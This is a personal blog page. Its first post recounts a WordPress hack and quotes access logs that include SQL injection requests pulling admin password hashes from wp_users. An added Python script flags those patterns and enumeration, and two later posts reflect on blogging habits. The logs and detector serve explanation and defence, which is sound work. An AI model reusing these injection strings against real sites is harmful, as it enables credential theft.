Hacked!

Last week, this blog was hacked. As far as hacks go, it was pretty minor: traffic coming from search engines was redirected to a spammy search engine (your-needs.info) with the query from the Referer header being passed along. Traffic from other links apparently didn’t get redirected.

The hack is described at the WordPress forums and appears to be spreading.

I’ve been running an ancient version of WordPress and had meant to upgrade, but it never seemed urgent; hopefully, I’ve learned that lesson. While upgrading, I decided to upgrade from the default WordPress 1.X theme I was using to this very nice Classy theme by Benedikt Rieke-Benninghaus, though I’ve already started tweaking it.

Thanks to Mike Hochster for telling me that my blog was broken and Brian White for pointing me at easy instructions for keeping WordPress up to date.

For the curious, I suspect the attack corresponded to one of the following log entries:

84.244.147.70 - - [27/May/2008:21:29:19 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
84.244.147.70 - - [27/May/2008:21:29:44 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-admin/ HTTP/1.1" 302 916 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:34 -0400] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 391 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "GET /xmlrpc.php HTTP/1.1" 200 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 941 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:36 -0400] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 8256 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:37 -0400] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=2 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=3 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:38 -0400] "GET /wp-trackback.php?p=4 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=5 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=6 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:39 -0400] "GET /wp-trackback.php?p=7 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:40 -0400] "GET /wp-trackback.php?p=8 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=9 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:41 -0400] "GET /wp-trackback.php?p=10 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=11 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=12 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:42 -0400] "GET /wp-trackback.php?p=13 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=14 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=15 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:43 -0400] "GET /wp-trackback.php?p=16 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=17 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=18 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:44 -0400] "GET /wp-trackback.php?p=19 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=20 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=21 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:45 -0400] "GET /wp-trackback.php?p=22 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=23 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=24 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:46 -0400] "GET /wp-trackback.php?p=25 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
87.118.112.44 - - [27/May/2008:21:35:47 -0400] "POST /wp-trackback.php?p=1 HTTP/1.1" 200 265 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 Security Kol)"
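
A triage pass over entries like the ones above, added here as an example and not part of the original post: it flags the scanner banner, UNION SELECT strings in the query (including the double-encoded %2527 quote), and one client stepping through numeric ids. The sample lines, tag names and threshold are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3} ')
SQLI_RE = re.compile(r"union\s+select|/\*", re.I)
ENUM_THRESHOLD = 5  # assumption: distinct numeric ids per client, path and parameter
# Constructed sample lines modelled on the entries above; addresses are documentation ranges.
SAMPLE = [
    '192.0.2.10 - - [27/May/2008:21:29:19 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"',
    '198.51.100.7 - - [27/May/2008:21:35:36 -0400] "GET /index.php?cat=%2527+UNION+SELECT+user_pass+FROM+wp_users/* HTTP/1.1" 200 8256 "-" "-"',
    '203.0.113.5 - - [27/May/2008:21:40:00 -0400] "GET /index.php?cat=3 HTTP/1.1" 200 8256 "-" "-"',
] + [f'198.51.100.7 - - [27/May/2008:21:35:40 -0400] "GET /wp-trackback.php?p={n} HTTP/1.1" 200 265 "-" "-"' for n in range(1, 8)]

def fully_decode(text, rounds=3):
    """URL-decode repeatedly so %2527 -> %27 -> ' is seen; returns (text, rounds used)."""
    for depth in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            return text, depth
        text = decoded
    return text, rounds

def scan(lines):
    """Return {client_ip: sorted list of findings} for combined-format access-log lines."""
    findings = defaultdict(set)
    ids_seen = defaultdict(set)  # (ip, path, parameter) -> numeric values requested
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        ip, target = m.groups()
        url = urlsplit(target)
        if "w00tw00t" in url.path:
            findings[ip].add("scanner-probe")
        decoded, depth = fully_decode(url.query)
        if SQLI_RE.search(decoded):
            findings[ip].add("sqli-attempt")
            if depth > 1:  # needed more than one decoding round to read
                findings[ip].add("double-encoded")
        for key, value in parse_qsl(url.query):
            if value.isdigit():
                ids_seen[(ip, url.path, key)].add(value)
    for (ip, _path, _key), values in ids_seen.items():
        if len(values) >= ENUM_THRESHOLD:
            findings[ip].add("id-enumeration")
    return {ip: sorted(tags) for ip, tags in findings.items()}
```

A 200 status on a flagged line only says the server answered; it does not show that the injection returned data.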

Why I don’t blog more

In theory, at least, I like to blog. I’ve tried to do it for at least five years. And I’ve never averaged more than one post per month.

I’ve come to realize that there are two things which I consider important in my life: my family and my job. (This should be an obvious fact about a married professional with two children, but I’ve rarely stated it that way for myself.) Most of my time is spent on one or the other. Add in the things I can’t seem to avoid, such as commuting or home renovations, and I’m left with almost nothing. I’ve lost touch with lots of friends. I rarely end up replying to personal email. My job is my only hobby. I do the other things I want to do — work out, cook, read books, see friends — much less than I’d like to.

This applies in the internet space, too. I don’t blog often. I haven’t written any open source code in years. I use Wikipedia but I don’t contribute back very often. I don’t post photos publicly.

It’s also why I haven’t tried out social networks. It seems that I have a hard enough time keeping up with my existing friends using traditional means that adding new techniques wouldn’t help — it would just create more obligations for me — though I’m beginning to rethink that.

So, maybe, when I ask myself why I’m not blogging, I need to remind myself that, in fact, I’ve made it less important than the few things I do actually find important. And I admire the people who blog well quite a lot, especially if it’s not their full-time career.

I think I like WordPress

So, I used to write a blog by hand in HTML. Then I wrote some tools to generate it from XML. Then I went back to hand-written HTML. And that explains why I average about six posts a year.

Perhaps blogging software isn’t a bad idea at all…

My next task is to pull the old, handwritten posts into WordPress. Then maybe I’ll play with themes.